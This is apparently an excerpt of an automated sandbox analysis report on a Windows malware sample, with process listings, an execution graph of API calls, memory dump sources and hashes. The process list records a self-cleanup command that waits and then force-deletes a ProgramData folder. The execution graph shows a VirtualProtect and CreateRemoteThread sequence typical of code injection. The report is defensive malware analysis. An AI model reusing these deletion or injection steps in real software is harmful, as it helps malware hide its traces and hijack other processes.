                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:22:13:09
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                            Start time:22:13:42
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFBFCAFCBKFI" & exit
                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:22:13:42
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                            Start time:22:13:42
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:timeout /t 10
                                                                                                                                                                                                                                                            Imagebase:0xe50000
                                                                                                                                                                                                                                                            File size:25'088 bytes
                                                                                                                                                                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:1.7%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                              Signature Coverage:2%
                                                                                                                                                                                                                                                              Total number of Nodes:404
                                                                                                                                                                                                                                                              Total number of Limit Nodes:18
                                                                                                                                                                                                                                                              execution_graph 31837 a17d82 31838 a17d8b 31837->31838 31842 a17dbd 31837->31842 31843 a11885 31838->31843 31844 a11890 31843->31844 31845 a11896 31843->31845 31891 a11f67 6 API calls std::_Lockit::_Lockit 31844->31891 31863 a1189c 31845->31863 31892 a11fa6 6 API calls std::_Lockit::_Lockit 31845->31892 31848 a118b0 31848->31863 31893 a1228d 31848->31893 31853 a118c8 31900 a11fa6 6 API calls std::_Lockit::_Lockit 31853->31900 31854 a118dd 31902 a11fa6 6 API calls std::_Lockit::_Lockit 31854->31902 31857 a118e9 31858 a118ed 31857->31858 31859 a118fc 31857->31859 31903 a11fa6 6 API calls std::_Lockit::_Lockit 31858->31903 31904 a115f8 14 API calls __Getctype 31859->31904 31867 a118a1 31863->31867 31906 a0e3f6 43 API calls CallUnexpected 31863->31906 31864 a118d4 31901 a11262 14 API calls __dosmaperr 31864->31901 31865 a11907 31905 a11262 14 API calls __dosmaperr 31865->31905 31868 a17b8d 31867->31868 31909 a17ce2 31868->31909 31875 a17bf7 31936 a17ddd 31875->31936 31876 a17be9 31947 a11262 14 API calls __dosmaperr 31876->31947 31879 a17bd0 31879->31842 31881 a17c2f 31948 a0bc10 14 API calls __dosmaperr 31881->31948 31883 a17c76 31886 a17cbf 31883->31886 31951 a177ff 43 API calls 2 library calls 31883->31951 31884 a17c34 31949 a11262 14 API calls __dosmaperr 31884->31949 31885 a17c4a 31885->31883 31950 a11262 14 API calls __dosmaperr 31885->31950 31952 a11262 14 API calls __dosmaperr 31886->31952 31891->31845 31892->31848 31899 a1229a __Getctype 31893->31899 31894 a122da 31908 a0bc10 14 API calls __dosmaperr 31894->31908 31895 a122c5 RtlAllocateHeap 31896 a118c0 31895->31896 31895->31899 31896->31853 31896->31854 31899->31894 31899->31895 31907 a10bb2 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 31899->31907 31900->31864 31901->31863 31902->31857 31903->31864 31904->31865 31905->31867 31907->31899 31908->31896 31910 a17cee __FrameHandler3::FrameUnwindToState 31909->31910 31912 a17d08 31910->31912 31953 a0bc64 EnterCriticalSection 31910->31953 31913 a17bb7 31912->31913 31956 a0e3f6 43 API calls CallUnexpected 31912->31956 31920 a1790d 31913->31920 31914 a17d44 31955 a17d61 LeaveCriticalSection std::_Lockit::~_Lockit 31914->31955 31918 a17d18 31918->31914 31954 a11262 14 API calls __dosmaperr 31918->31954 31957 a0e32c 31920->31957 31923 a17940 31925 a17957 31923->31925 31926 a17945 GetACP 31923->31926 31924 a1792e GetOEMCP 31924->31925 31925->31879 31927 a1223f 31925->31927 31926->31925 31928 a1227d 31927->31928 31929 a1224d 31927->31929 31969 a0bc10 14 API calls __dosmaperr 31928->31969 31930 a12268 HeapAlloc 31929->31930 31935 a12251 __Getctype 31929->31935 31932 a1227b 31930->31932 31930->31935 31933 a12282 31932->31933 31933->31875 31933->31876 31935->31928 31935->31930 31968 a10bb2 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 31935->31968 31937 a1790d 45 API calls 31936->31937 31938 a17dfd 31937->31938 31939 a17e3a IsValidCodePage 31938->31939 31944 a17e76 ctype 31938->31944 31942 a17e4c 31939->31942 31939->31944 31941 a17c24 31941->31881 31941->31885 31943 a17e7b GetCPInfo 31942->31943 31946 a17e55 ctype 31942->31946 31943->31944 31943->31946 31981 a067bb 31944->31981 31970 a179e1 31946->31970 31947->31879 31948->31884 31949->31879 31950->31883 31951->31886 31952->31879 31953->31918 31954->31914 31955->31912 31958 a0e34a 31957->31958 31964 a0e343 31957->31964 31958->31964 31965 a117ca 43 API calls 3 library calls 31958->31965 31960 a0e36b 31966 a113d0 43 API calls __Getctype 31960->31966 31962 a0e381 31967 a1142e 43 API calls __strnicoll 31962->31967 31964->31923 31964->31924 31965->31960 31966->31962 31967->31964 31968->31935 31969->31933 31971 a17a09 GetCPInfo 31970->31971 31972 a17ad2 31970->31972 31971->31972 31973 a17a21 31971->31973 31975 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31972->31975 31988 a15b52 31973->31988 31977 a17b8b 31975->31977 31977->31944 31980 a15e49 48 API calls 31980->31972 31982 a067c3 31981->31982 31983 a067c4 IsProcessorFeaturePresent 31981->31983 31982->31941 31985 a07102 31983->31985 32072 a070c5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 31985->32072 31987 a071e5 31987->31941 31989 a0e32c __strnicoll 43 API calls 31988->31989 31990 a15b72 31989->31990 32008 a16c56 31990->32008 31992 a15c36 31994 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31992->31994 31993 a15c2e 32011 a0654c 14 API calls ___std_exception_destroy 31993->32011 31997 a15c59 31994->31997 31995 a15b9f 31995->31992 31995->31993 31996 a1223f __strnicoll 15 API calls 31995->31996 31999 a15bc4 __alloca_probe_16 ctype 31995->31999 31996->31999 32003 a15e49 31997->32003 31999->31993 32000 a16c56 __strnicoll MultiByteToWideChar 31999->32000 32001 a15c0f 32000->32001 32001->31993 32002 a15c1a GetStringTypeW 32001->32002 32002->31993 32004 a0e32c __strnicoll 43 API calls 32003->32004 32005 a15e5c 32004->32005 32012 a15c5b 32005->32012 32009 a16c67 MultiByteToWideChar 32008->32009 32009->31995 32011->31992 32013 a15c76 __strnicoll 32012->32013 32014 a16c56 __strnicoll MultiByteToWideChar 32013->32014 32018 a15cbc 32014->32018 32015 a15e34 32016 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32015->32016 32017 a15e47 32016->32017 32017->31980 32018->32015 32019 a1223f __strnicoll 15 API calls 32018->32019 32021 a15ce2 __alloca_probe_16 32018->32021 32032 a15d68 32018->32032 32019->32021 32022 a16c56 __strnicoll MultiByteToWideChar 32021->32022 32021->32032 32023 a15d27 32022->32023 32023->32032 32040 a12125 32023->32040 32026 a15d91 32028 a15e1c 32026->32028 32030 a1223f __strnicoll 15 API calls 32026->32030 32033 a15da3 __alloca_probe_16 32026->32033 32027 a15d59 32029 a12125 std::_Locinfo::_Locinfo_dtor 7 API calls 32027->32029 32027->32032 32051 a0654c 14 API calls ___std_exception_destroy 32028->32051 32029->32032 32030->32033 32052 a0654c 14 API calls ___std_exception_destroy 32032->32052 32033->32028 32034 a12125 std::_Locinfo::_Locinfo_dtor 7 API calls 32033->32034 32035 a15de6 32034->32035 32035->32028 32049 a16cd2 WideCharToMultiByte 32035->32049 32037 a15e00 32037->32028 32038 a15e09 32037->32038 32050 a0654c 14 API calls ___std_exception_destroy 32038->32050 32053 a11c57 32040->32053 32043 a12136 LCMapStringEx 32048 a1217d 32043->32048 32044 a1215d 32056 a12182 5 API calls __strnicoll 32044->32056 32047 a12176 LCMapStringW 32047->32048 32048->32026 32048->32027 32048->32032 32049->32037 32050->32032 32051->32032 32052->32015 32057 a11d56 32053->32057 32056->32047 32058 a11c6d 32057->32058 32059 a11d84 32057->32059 32058->32043 32058->32044 32059->32058 32064 a11c8b 32059->32064 32062 a11d9e GetProcAddress 32062->32058 32063 a11dae std::_Lockit::_Lockit 32062->32063 32063->32058 32070 a11c9c ___vcrt_FlsSetValue 32064->32070 32065 a11d32 32065->32058 32065->32062 32066 a11cba LoadLibraryExW 32067 a11cd5 GetLastError 32066->32067 32068 a11d39 32066->32068 32067->32070 32068->32065 32069 a11d4b FreeLibrary 32068->32069 32069->32065 32070->32065 32070->32066 32071 a11d08 LoadLibraryExW 32070->32071 32071->32068 32071->32070 32072->31987 32073 a13177 32085 a12ddc 32073->32085 32075 a13190 32076 a13184 32076->32075 32081 a131dc 32076->32081 32103 a1350d 45 API calls __fread_nolock 32076->32103 32080 a1324f 32081->32075 32084 a1323e 32081->32084 32092 a14e1d 32081->32092 32104 a13367 68 API calls 2 library calls 32084->32104 32086 a12de8 32085->32086 32087 a12dfd 32085->32087 32105 a0bc10 14 API calls __dosmaperr 32086->32105 32087->32076 32089 a12ded 32106 a0bb12 43 API calls __strnicoll 32089->32106 32091 a12df8 32091->32076 32093 a14e29 32092->32093 32094 a12ddc _Ungetc 43 API calls 32093->32094 32097 a13231 32093->32097 32095 a14e44 32094->32095 32107 a1b410 43 API calls 2 library calls 32095->32107 32097->32084 32098 a1374c 32097->32098 32099 a1228d __Getctype 14 API calls 32098->32099 32100 a13769 32099->32100 32108 a11262 14 API calls __dosmaperr 32100->32108 32102 a13773 32102->32084 32103->32081 32104->32080 32105->32089 32106->32091 32107->32097 32108->32102 32109 a02057 32110 a02061 32109->32110 32113 a020a2 32110->32113 32114 a023ad 32110->32114 32130 a02634 101 API calls 32110->32130 32116 a023b9 __EH_prolog3_catch _strlen 32114->32116 32131 a02b06 45 API calls 32116->32131 32117 a0242d 32125 a02433 32117->32125 32132 a02f03 75 API calls 5 library calls 32117->32132 32120 a0261e 32138 a02aeb 45 API calls 32120->32138 32121 a02462 std::ios_base::_Ios_base_dtor 32126 a024b8 32121->32126 32133 a02b65 32121->32133 32123 a02626 codecvt 32123->32110 32137 a01c07 45 API calls 2 library calls 32125->32137 32126->32125 32127 a0255a 32126->32127 32129 a02b65 72 API calls 32126->32129 32127->32125 32128 a02b65 72 API calls 32127->32128 32128->32127 32129->32126 32130->32110 32131->32117 32132->32121 32134 a02b6d 32133->32134 32135 a02b75 32134->32135 32139 a044bb 32134->32139 32135->32121 32137->32120 32138->32123 32140 a044e6 32139->32140 32145 a044dd 32139->32145 32142 a04526 32140->32142 32140->32145 32146 a0454c 32140->32146 32141 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32143 a04548 32141->32143 32151 a03928 32142->32151 32143->32135 32145->32141 32147 a045a7 32146->32147 32148 a04588 32146->32148 32147->32145 32154 a0d45b 71 API calls _Fputc 32147->32154 32148->32145 32150 a03928 _Fputc 47 API calls 32148->32150 32150->32145 32155 a0c4e7 32151->32155 32154->32145 32156 a0c4fa _Fputc 32155->32156 32161 a0c2eb 32156->32161 32160 a03936 32160->32145 32162 a0c2f7 __FrameHandler3::FrameUnwindToState 32161->32162 32163 a0c323 32162->32163 32164 a0c2fe 32162->32164 32173 a0c0dc EnterCriticalSection 32163->32173 32196 a0ba95 43 API calls 2 library calls 32164->32196 32167 a0c332 32174 a0c3af 32167->32174 32171 a0c319 32172 a0b630 43 API calls _Fputc 32171->32172 32172->32160 32173->32167 32175 a0c3e6 32174->32175 32195 a0c3d4 _Fputc 32174->32195 32176 a12ddc _Ungetc 43 API calls 32175->32176 32177 a0c3ed 32176->32177 32179 a12ddc _Ungetc 43 API calls 32177->32179 32182 a0c415 32177->32182 32178 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32180 a0c343 32178->32180 32181 a0c3fe 32179->32181 32197 a0c373 LeaveCriticalSection _Ungetc 32180->32197 32181->32182 32183 a12ddc _Ungetc 43 API calls 32181->32183 32184 a12ddc _Ungetc 43 API calls 32182->32184 32182->32195 32185 a0c40a 32183->32185 32186 a0c448 32184->32186 32187 a12ddc _Ungetc 43 API calls 32185->32187 32188 a12ddc _Ungetc 43 API calls 32186->32188 32194 a0c46b 32186->32194 32187->32182 32190 a0c454 32188->32190 32191 a12ddc _Ungetc 43 API calls 32190->32191 32190->32194 32192 a0c460 32191->32192 32193 a12ddc _Ungetc 43 API calls 32192->32193 32193->32194 32194->32195 32198 a135a8 32194->32198 32195->32178 32196->32171 32197->32171 32199 a135bd 32198->32199 32202 a135fe 32199->32202 32205 a135c1 ctype _Fputc 32199->32205 32207 a135ea ctype 32199->32207 32208 a0b780 43 API calls _Fputc 32199->32208 32202->32205 32202->32207 32209 a16cd2 WideCharToMultiByte 32202->32209 32204 a136b9 32204->32205 32206 a136cf GetLastError 32204->32206 32205->32195 32206->32205 32206->32207 32207->32205 32210 a0ba95 43 API calls 2 library calls 32207->32210 32208->32202 32209->32204 32210->32205 32211 a0662f 32212 a0663b __FrameHandler3::FrameUnwindToState 32211->32212 32237 a068a5 32212->32237 32214 a06642 32215 a0679b 32214->32215 32224 a0666c ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 32214->32224 32269 a06e56 4 API calls 2 library calls 32215->32269 32217 a067a2 32262 a0f3c9 32217->32262 32221 a067b0 32222 a0668b 32223 a0670c 32245 a0f007 32223->32245 32224->32222 32224->32223 32265 a0f3a3 43 API calls 4 library calls 32224->32265 32227 a06712 32249 a020a7 32227->32249 32231 a06733 32231->32217 32232 a06737 32231->32232 32233 a06740 32232->32233 32267 a0f37e 23 API calls CallUnexpected 32232->32267 32268 a06a16 79 API calls ___scrt_uninitialize_crt 32233->32268 32236 a06749 32236->32222 32238 a068ae 32237->32238 32271 a06b7c IsProcessorFeaturePresent 32238->32271 32240 a068ba 32272 a098ae 10 API calls 2 library calls 32240->32272 32242 a068bf 32243 a068c3 32242->32243 32273 a098cd 7 API calls 2 library calls 32242->32273 32243->32214 32246 a0f010 32245->32246 32247 a0f015 32245->32247 32274 a0ed61 58 API calls 32246->32274 32247->32227 32275 a021b1 32249->32275 32253 a020cc 32293 a01e79 32253->32293 32259 a02138 32260 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32259->32260 32261 a02145 32260->32261 32266 a06f70 GetModuleHandleW 32261->32266 32350 a0f1b1 32262->32350 32265->32223 32266->32231 32267->32233 32268->32236 32269->32217 32270 a0f38d 23 API calls CallUnexpected 32270->32221 32271->32240 32272->32242 32273->32243 32274->32247 32276 a021ce _strlen 32275->32276 32325 a0285b 32276->32325 32278 a020c5 32279 a067ce 32278->32279 32281 a067d3 32279->32281 32282 a067ed 32281->32282 32284 a067ef 32281->32284 32336 a10bb2 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 32281->32336 32337 a0bcda 15 API calls 3 library calls 32281->32337 32282->32253 32285 a0122f std::_Facet_Register 32284->32285 32286 a067f9 std::_Facet_Register 32284->32286 32334 a08fbf RaiseException 32285->32334 32338 a08fbf RaiseException 32286->32338 32289 a0124b 32335 a011a5 44 API calls ___std_exception_copy 32289->32335 32290 a072e3 32292 a01258 32292->32253 32294 a01f73 32293->32294 32303 a01eaa 32293->32303 32339 a02147 32294->32339 32297 a021b1 45 API calls std::ios_base::_Init 32297->32303 32298 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32299 a01f8d VirtualProtect CreateRemoteThread WaitForSingleObject 32298->32299 32304 a01c94 32299->32304 32300 a0b8ae 46 API calls 32300->32303 32301 a02264 45 API calls 32301->32303 32302 a0223e 43 API calls std::ios_base::_Init 32302->32303 32303->32294 32303->32297 32303->32300 32303->32301 32303->32302 32305 a067ce std::_Facet_Register 45 API calls 32304->32305 32306 a01cb9 32305->32306 32307 a021b1 std::ios_base::_Init 45 API calls 32306->32307 32311 a01cdb 32307->32311 32308 a01e73 32349 a01c89 75 API calls 4 library calls 32308->32349 32309 a01d55 32344 a03181 45 API calls 2 library calls 32309->32344 32311->32308 32311->32309 32314 a01d78 32311->32314 32313 a01e78 32346 a0223e 43 API calls _Deallocate 32314->32346 32315 a01d69 32345 a02fdd 43 API calls 2 library calls 32315->32345 32319 a01d90 32321 a01e51 32319->32321 32347 a02666 45 API calls 4 library calls 32319->32347 32348 a02829 75 API calls 32319->32348 32322 a067bb __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 32321->32322 32323 a01e6c 32322->32323 32324 a0223e 43 API calls _Deallocate 32323->32324 32324->32259 32326 a028c6 32325->32326 32329 a0286c std::ios_base::_Init 32325->32329 32333 a0129e 45 API calls std::_Xinvalid_argument 32326->32333 32331 a02873 std::ios_base::_Init 32329->32331 32332 a02fbb 45 API calls 2 library calls 32329->32332 32331->32278 32332->32331 32334->32289 32335->32292 32336->32281 32337->32281 32338->32290 32340 a01f7c 32339->32340 32341 a0214f 32339->32341 32340->32298 32343 a02a82 43 API calls 2 library calls 32341->32343 32343->32340 32344->32315 32345->32314 32346->32319 32347->32319 32348->32319 32349->32313 32351 a0f1f0 32350->32351 32352 a0f1de 32350->32352 32362 a0f079 32351->32362 32377 a0f279 GetModuleHandleW 32352->32377 32356 a0f1e3 32356->32351 32378 a0f2de GetModuleHandleExW 32356->32378 32357 a067a8 32357->32270 32361 a0f242 32363 a0f085 __FrameHandler3::FrameUnwindToState 32362->32363 32384 a0bc64 EnterCriticalSection 32363->32384 32365 a0f08f 32385 a0f0c6 32365->32385 32367 a0f09c 32389 a0f0ba 32367->32389 32370 a0f248 32394 a0f2bc 32370->32394 32373 a0f266 32375 a0f2de CallUnexpected 3 API calls 32373->32375 32374 a0f256 GetCurrentProcess TerminateProcess 32374->32373 32376 a0f26e ExitProcess 32375->32376 32377->32356 32379 a0f31d GetProcAddress 32378->32379 32380 a0f33e 32378->32380 32379->32380 32383 a0f331 32379->32383 32381 a0f344 FreeLibrary 32380->32381 32382 a0f1ef 32380->32382 32381->32382 32382->32351 32383->32380 32384->32365 32386 a0f0d2 __FrameHandler3::FrameUnwindToState 32385->32386 32388 a0f139 CallUnexpected 32386->32388 32392 a10ee3 14 API calls 3 library calls 32386->32392 32388->32367 32393 a0bcac LeaveCriticalSection 32389->32393 32391 a0f0a8 32391->32357 32391->32370 32392->32388 32393->32391 32399 a184ac GetPEB 32394->32399 32397 a0f2c6 GetPEB 32398 a0f252 32397->32398 32398->32373 32398->32374 32400 a0f2c1 32399->32400 32401 a184c6 32399->32401 32400->32397 32400->32398 32403 a11dd9 32401->32403 32404 a11d56 std::_Lockit::_Lockit 5 API calls 32403->32404 32405 a11df5 32404->32405 32405->32400
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 863973fb843b44f4181189f3f862c2c6324593acd912259d5ad9aa43f6a36062
                                                                                                                                                                                                                                                              • Instruction ID: a29922750c100dece1c30b290a6002b6a982f245c3577ddab2478806f608296b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 863973fb843b44f4181189f3f862c2c6324593acd912259d5ad9aa43f6a36062
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48E08C32911278EBCB14DB88CA04D8AF3ECEB44B10B1109AAB901D3100DA78DE40C7D0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8de157ae7f70aa572271f9e4d8239843e4e4338bba078dda5b3633f9ef309906
                                                                                                                                                                                                                                                              • Instruction ID: 5953184eb18c548d0260e7892651a9ecc0be99a3b0af80d44765fc60c9d3436e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8de157ae7f70aa572271f9e4d8239843e4e4338bba078dda5b3633f9ef309906
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50C08C3C002E088ACE398A1092B13E43354B7D5782F84049CC8030BA82CA1E9CC3D600
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 0 a11c8b-a11c97 1 a11d29-a11d2c 0->1 2 a11d32 1->2 3 a11c9c-a11cad 1->3 4 a11d34-a11d38 2->4 5 a11cba-a11cd3 LoadLibraryExW 3->5 6 a11caf-a11cb2 3->6 9 a11cd5-a11cde GetLastError 5->9 10 a11d39-a11d49 5->10 7 a11d52-a11d54 6->7 8 a11cb8 6->8 7->4 12 a11d26 8->12 13 a11ce0-a11cf2 call a11228 9->13 14 a11d17-a11d24 9->14 10->7 11 a11d4b-a11d4c FreeLibrary 10->11 11->7 12->1 13->14 17 a11cf4-a11d06 call a11228 13->17 14->12 17->14 20 a11d08-a11d15 LoadLibraryExW 17->20 20->10 20->14
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00A11D98,?,00000000,00000000,00000000,?,?,00A11FC2,00000021,FlsSetValue,00A223C8,00A223D0,00000000), ref: 00A11D4C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_a00000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                              • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                              • Opcode ID: 1f24360dfe9e04aaa2cb12d06ec4810fa3719149b9fdedbf6dd2385e4f8f8e82
                                                                                                                                                                                                                                                              • Instruction ID: bc3b668f7543cad604db6a0823a34361e4753f51e31d49b4e8377af5f9c56c0a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f24360dfe9e04aaa2cb12d06ec4810fa3719149b9fdedbf6dd2385e4f8f8e82
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB212771A01212EBC721DB68FD40AEA7768AF053A0F254231FE05A7291E730ED42C6D0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
